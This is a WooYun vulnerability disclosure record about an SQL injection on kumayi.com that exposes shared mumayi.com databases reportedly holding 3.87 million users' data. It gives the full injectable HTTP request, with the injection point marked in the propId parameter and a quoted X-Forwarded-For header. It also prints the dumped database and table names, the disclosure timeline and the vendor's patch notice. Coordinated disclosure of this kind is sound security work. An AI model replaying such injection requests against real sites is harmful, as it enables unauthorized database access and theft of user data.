当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169139

漏洞标题:木蚂蚁SQL注入影响多个站(涉及387万用户数据\以及酷蚂蚁)

相关厂商:mumayi.com

漏洞作者: 路人甲

提交时间:2016-01-11 16:56

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

几个站数据库放一起~

详细说明:

由酷蚂蚁引出的问题
注入点:

POST /index.php?s=/Home/Game/zhifumycard HTTP/1.1
Host: www.kumayi.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.kumayi.com/index.php?s=/Home/Game/buymycard/apkid/1560/channelid/101126
Cookie: PHPSESSID=86tdgc15vuq8ff2snl8m1tpm43; CNZZDATA1255732784=1054442556-1452495201-http%253A%252F%252Fwww.kumayi.com%252F%7C1452495201; 0f518e1608f240990835a3490e61c734=%2C138%2C%E6%80%92%E6%96%A9%E8%BD%A9%E8%BE%95%2C%E6%94%BE%E5%BC%80%E9%82%A3%E4%B8%89%E5%9B%BD%2C%E5%A5%B3%E7%A5%9E%E8%81%94%E7%9B%9F
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 452
mycard_submit=6%E5%85%83%EF%BC%8860%E9%92%BB%E7%9F%B3%EF%BC%89&mycard=25%E5%85%83%EF%BC%88%E6%9C%88%E5%8D%A1%EF%BC%89&mycard=30%E5%85%83%EF%BC%88300%E9%92%BB%E7%9F%B3%EF%BC%89&mycard=98%E5%85%83%EF%BC%88980%E9%92%BB%E7%9F%B3%EF%BC%89&mycard=198%E5%85%83%EF%BC%881980%E9%92%BB%E7%9F%B3%EF%BC%89&mycard=328%E5%85%83%EF%BC%883280%E9%92%BB%E7%9F%B3%EF%BC%89&mycard=648%E5%85%83%EF%BC%886480%E9%92%BB%E7%9F%B3%EF%BC%89&propId=883*&apkid=1560&channelid=101126

漏洞证明:

available databases [5]:                                                       
[*] information_schema
[*] kumayipay_kumayi
[*] mumayipay_mumayi
[*] oauth
[*] uc_mumayi


Database: mumayipay_mumayi                                                                                  
[104 tables]
+-----------------------------------------+
| kumayipay_kumayi_gift                   |
| kumayipay_kumayi_giftcode               |
| mumayipay_agency_order                  |
| mumayipay_agent_info                    |
| mumayipay_apk_images                    |
| mumayipay_app                           |
| mumayipay_app_url                       |
| mumayipay_callinfo                      |
| mumayipay_cdnrsync                      |
| mumayipay_channel                       |
| mumayipay_channel_dbo                   |
| mumayipay_channel_info                  |
| mumayipay_channel_rate                  |
| mumayipay_channel_statistical           |
| mumayipay_coin                          |
| mumayipay_coin_log                      |
| mumayipay_consumption                   |
| mumayipay_cooperation_update            |
| mumayipay_cooperation_user              |
| mumayipay_day                           |
| mumayipay_day_login                     |
| mumayipay_day_reg                       |
| mumayipay_day_user                      |
| mumayipay_dbo_apk                       |
| mumayipay_dbo_member                    |
| mumayipay_developerinfo                 |
| mumayipay_downlog                       |
| mumayipay_expectladderinfo              |
| mumayipay_feedback                      |
| mumayipay_gamenotice                    |
| mumayipay_generation_log                |
| mumayipay_kumayi_member                 |
| mumayipay_kumayi_message                |
| mumayipay_kumayi_mycard                 |
| mumayipay_kumayi_notice                 |
| mumayipay_kumayi_payuser                |
| mumayipay_kumayi_search                 |
| mumayipay_ladder                        |
| mumayipay_ladder_custom                 |
| mumayipay_ladderinfo                    |
| mumayipay_log_status                    |
| mumayipay_login_flag                    |
| mumayipay_member                        |
| mumayipay_message                       |
| mumayipay_mobileinfo                    |
| mumayipay_month                         |
| mumayipay_mycard                        |
| mumayipay_mycard_scm                    |
| mumayipay_notice                        |
| mumayipay_order                         |
| mumayipay_order_a                       |
| mumayipay_order_b                       |
| mumayipay_order_c                       |
| mumayipay_order_d                       |
| mumayipay_order_e                       |
| mumayipay_order_f                       |
| mumayipay_order_g                       |
| mumayipay_order_h                       |
| mumayipay_order_i                       |
| mumayipay_order_id                      |
| mumayipay_order_j                       |
| mumayipay_order_k                       |
| mumayipay_order_l                       |
| mumayipay_order_m                       |
| mumayipay_order_n                       |
| mumayipay_order_o                       |
| mumayipay_order_p                       |
| mumayipay_order_q                       |
| mumayipay_order_r                       |
| mumayipay_order_s                       |
| mumayipay_order_t                       |
| mumayipay_order_u                       |
| mumayipay_order_v                       |
| mumayipay_order_w                       |
| mumayipay_order_x                       |
| mumayipay_order_y                       |
| mumayipay_order_z                       |
| mumayipay_pay_user                      |
| mumayipay_profitsetinginfo              |
| mumayipay_protect_list                  |
| mumayipay_queue                         |
| mumayipay_quota                         |
| mumayipay_rate                          |
| mumayipay_recharge                      |
| mumayipay_search                        |
| mumayipay_settlement                    |
| mumayipay_stapayleave                   |
| mumayipay_statistical                   |
| mumayipay_subcontract                   |
| mumayipay_subcontract_bak               |
| mumayipay_subcontract_increment         |
| mumayipay_subcontract_increment_upgrade |
| mumayipay_subcontract_upgrade           |
| mumayipay_system                        |
| mumayipay_type                          |
| mumayipay_uc_member                     |
| mumayipay_union_apk                     |
| mumayipay_union_prop                    |
| mumayipay_union_settlement              |
| mumayipay_union_settlement_desc         |
| mumayipay_union_settlement_time         |
| mumayipay_union_upgrade                 |
| mumayipay_userprice                     |
| mumayipay_verifcode


部分数据证明危害:涉及到387万用户数据:

屏幕快照 2016-01-11 下午4.08.18.png


屏幕快照 2016-01-11 下午4.26.55副本.png


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-01-11 17:02

厂商回复:

技术蚂蚁已经在修复,感谢感谢

最新状态:

2016-01-28:非常谢谢,反馈的安全问题,我们技术已打上安全补丁。